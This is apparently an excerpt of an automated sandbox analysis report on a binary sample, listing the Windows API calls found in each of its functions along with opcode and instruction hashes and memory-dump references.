                                                • Instruction ID: 8817e505a84b5181b8037cf61dc408902e7aa3a606a5ef246f66695a7b8c8990
                                                • Opcode Fuzzy Hash: 2883671f3d2c80ef21a22c388fee293ad6debf11ca291375820406ceaac695ec
                                                • Instruction Fuzzy Hash: 9C512535A04209DFCB10EFA8C8849EDB7F5EF09320B048069E955AB322D779ED45EF91
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FEE61F
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FEE648
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FEE687
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FEE6AC
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FEE6B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: 9db45e98863fd97b40052803cec56e35ec03bde3dd95a3826dff4b8b04ef61fa
                                                • Instruction ID: 1023e51f3caca8fff9e100d10b29d579161b462e85f1718310b9d400d56b9343
                                                • Opcode Fuzzy Hash: 9db45e98863fd97b40052803cec56e35ec03bde3dd95a3826dff4b8b04ef61fa
                                                • Instruction Fuzzy Hash: D8513B35A00206DFCB11EF65D981AAEBBF5EF09314F188099E849AB361CB75ED11EF50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00a8fb69aa9fd114bcd68e576d7140506a6fc275ce6a461b053f43c84cb1cf18
                                                • Instruction ID: 49ab9c224468fb2d5a64d4bfe6323144215f5c1a351f24d15ce2872540a175f8
                                                • Opcode Fuzzy Hash: 00a8fb69aa9fd114bcd68e576d7140506a6fc275ce6a461b053f43c84cb1cf18
                                                • Instruction Fuzzy Hash: D3419235A04204EFF762DB68CC88FE9BBA4AB09390F0501A5FA95A72D1CB75A941DB50
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00F82357
                                                • ScreenToClient.USER32(010457B0,?), ref: 00F82374
                                                • GetAsyncKeyState.USER32(00000001), ref: 00F82399
                                                • GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: e79e1066a935922d8dd87a2266d25034e47f262351a11f139fd2107a790320b9
                                                • Instruction ID: c57b3b527323c77dbb0507f4574c36f5d8708a70f533eea5af4a3ef919c909f1
                                                • Opcode Fuzzy Hash: e79e1066a935922d8dd87a2266d25034e47f262351a11f139fd2107a790320b9
                                                • Instruction Fuzzy Hash: EC418275A0410AFBDF25AF69CC44AEEBB75FB05370F20431AF86992290C735A950EF91
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD63E7
                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00FD6433
                                                • TranslateMessage.USER32(?), ref: 00FD645C
                                                • DispatchMessageW.USER32(?), ref: 00FD6466
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD6475
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                • String ID:
                                                • API String ID: 2108273632-0
                                                • Opcode ID: 0614a45295d5e67637d04279aa3713628542fda1dd74c780682ebbf6f98499ba
                                                • Instruction ID: ac1577a66a24ef1d3e74d9dcbebb38bd4639b557fd04feec7cac0aff862a9242
                                                • Opcode Fuzzy Hash: 0614a45295d5e67637d04279aa3713628542fda1dd74c780682ebbf6f98499ba
                                                • Instruction Fuzzy Hash: 0F31F871D402029FDB34DFB4DD84BB67BAEAB06320F18016BE461C3295E77A9449FB50
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00FD8A30
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00FD8ADA
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FD8AE2
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00FD8AF0
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FD8AF8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                                                • Instruction ID: 11a2a38051746fb94a53ad9128489cdf01f3f90f0cb151a275f40488797d79df
                                                • Opcode Fuzzy Hash: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                                                • Instruction Fuzzy Hash: 1431C271900219FBDF24CF68D94CA9E3BB6EB05325F14421AF925E72C0C7B49915EB90
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00FDB204
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FDB221
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FDB259
                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FDB27F
                                                • _wcsstr.LIBCMT ref: 00FDB289
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                • String ID:
                                                • API String ID: 3902887630-0
                                                • Opcode ID: e1e9136cac1882bd4937d7d7cb2398d17f915e063e893a9c4d8997f075042c2b
                                                • Instruction ID: 6f6357e2133416fb3f7745e42920522e4237c3019c50232ded30ee7f4ce9b832
                                                • Opcode Fuzzy Hash: e1e9136cac1882bd4937d7d7cb2398d17f915e063e893a9c4d8997f075042c2b
                                                • Instruction Fuzzy Hash: 65212573604201BBEB265F399C49E7F7B99DF4A761F05412AF804CA251EF65DC40B360
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0100B192
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0100B1B7
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0100B1CF
                                                • GetSystemMetrics.USER32(00000004), ref: 0100B1F8
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FF0E90,00000000), ref: 0100B216
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: 2fcce85c40dac9a38f11f785f053428e4feaa81e3a0b4db9d9ff82f2f3320599
                                                • Instruction ID: b3c0865f38e90d0ec5992d381e3605b5bd7ea188b9511eb9987ce09ea86d5a41
                                                • Opcode Fuzzy Hash: 2fcce85c40dac9a38f11f785f053428e4feaa81e3a0b4db9d9ff82f2f3320599
                                                • Instruction Fuzzy Hash: 0F21D375910212AFEB629F3CDC44AAA3BA4FB05321F104768FEB2D31D0E7319810CB80
                                                APIs
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FD9320
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9352
                                                • __itow.LIBCMT ref: 00FD936A
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9392
                                                • __itow.LIBCMT ref: 00FD93A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow$_memmove
                                                • String ID:
                                                • API String ID: 2983881199-0
                                                • Opcode ID: 4890a239bbe6330c92aa30fe30736557c07ac4b5eb8bfc98544bc992591622d4
                                                • Instruction ID: b37ce312f8f57ad1268238a9cecc67cdc264fb5f3e2d5629aa278105e1c6da37
                                                • Opcode Fuzzy Hash: 4890a239bbe6330c92aa30fe30736557c07ac4b5eb8bfc98544bc992591622d4
                                                • Instruction Fuzzy Hash: 4921F831B042046BDB21AAE18C85EEE7BAEEB89720F184026FD44DB280D6B4CD41B791
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 00FF5A6E
                                                • GetForegroundWindow.USER32 ref: 00FF5A85
                                                • GetDC.USER32(00000000), ref: 00FF5AC1
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00FF5ACD
                                                • ReleaseDC.USER32(00000000,00000003), ref: 00FF5B08
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: 29a495671c7d3b107abbeab1f57391a94678d135f2b05573cc6d9d3599451caf
                                                • Instruction ID: c9370b2ab251a9fac1c1d3e1b0f89c477606eb183050bdecf24260b77aa55a83
                                                • Opcode Fuzzy Hash: 29a495671c7d3b107abbeab1f57391a94678d135f2b05573cc6d9d3599451caf
                                                • Instruction Fuzzy Hash: 5E21C335A00104AFDB20EF65DC84AAABBE5EF48350F148079F949D7352CB78AD01EB90
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F8134D
                                                • SelectObject.GDI32(?,00000000), ref: 00F8135C
                                                • BeginPath.GDI32(?), ref: 00F81373
                                                • SelectObject.GDI32(?,00000000), ref: 00F8139C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 094206118c87449b243cb07b640d05b44bab43d5426e9a249841b6af21b97b9d
                                                • Instruction ID: 7ba505a4953ef15a1d1969751abe221cf63fee88f01bac1670846eee30cf90e9
                                                • Opcode Fuzzy Hash: 094206118c87449b243cb07b640d05b44bab43d5426e9a249841b6af21b97b9d
                                                • Instruction Fuzzy Hash: CF21B674C00308DFEB319F15DD847A93BE8FB04321F244319F494A6194DB7A9892EF90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: a7ef2aaa7eeb203d43dfc6d6904ad94d76177a39d1a8c07338fdec7d4fb64031
                                                • Instruction ID: 2e33836d0137bb43b2ac8b0042d891314fc038ec234130667e07f031af3396c9
                                                • Opcode Fuzzy Hash: a7ef2aaa7eeb203d43dfc6d6904ad94d76177a39d1a8c07338fdec7d4fb64031
                                                • Instruction Fuzzy Hash: 0F01B9B2600109BBD204AE265D42FBB735EFF16398F1A4016FD0596306EB54EE10B2A4
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00FE4ABA
                                                • __beginthreadex.LIBCMT ref: 00FE4AD8
                                                • MessageBoxW.USER32(?,?,?,?), ref: 00FE4AED
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FE4B03
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FE4B0A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                • String ID:
                                                • API String ID: 3824534824-0
                                                • Opcode ID: eea2c3cf49c1a21ec0a8cd8d9e9aa1eb52e2be70b21b780aa3a749f72953bbe7
                                                • Instruction ID: 4b80469a88b2c3f6cccd2a63c3b647f819495c36b83bd1cbaad30a22ec8e8d94
                                                • Opcode Fuzzy Hash: eea2c3cf49c1a21ec0a8cd8d9e9aa1eb52e2be70b21b780aa3a749f72953bbe7
                                                • Instruction Fuzzy Hash: 601148B6D04244BBC7219FA99C48ADB7FACEB86320F14425AF854D3240D67AE9049BA0
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD821E
                                                • GetLastError.KERNEL32(?,00FD7CE2,?,?,?), ref: 00FD8228
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00FD7CE2,?,?,?), ref: 00FD8237
                                                • HeapAlloc.KERNEL32(00000000,?,00FD7CE2,?,?,?), ref: 00FD823E
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD8255
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                • Opcode ID: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                                                • Instruction ID: 192e9f845ee0bcaaedb7e1a8632a03a2e271ac965d981c5476092fdeabffabea
                                                • Opcode Fuzzy Hash: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                                                • Instruction Fuzzy Hash: D8016D71604205BFDB319FA5DC49DAB7BBDEF8A7A5B50046AF849C2210DB329C01EB60
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?,?,?,00FD7455), ref: 00FD7127
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?,?), ref: 00FD7142
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?,?), ref: 00FD7150
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?), ref: 00FD7160
                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?,?), ref: 00FD716C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                                                • Instruction ID: 0dea0db1112b14864265f3fd90cea4519da816765ad6c27b165859663ce48293
                                                • Opcode Fuzzy Hash: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                                                • Instruction Fuzzy Hash: 3601D472600325BBCB225F24DC44BAA7BBEEF44761F180155FD44D6314E736DE00A7A0
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5260
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE526E
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5276
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE5280
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE52BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
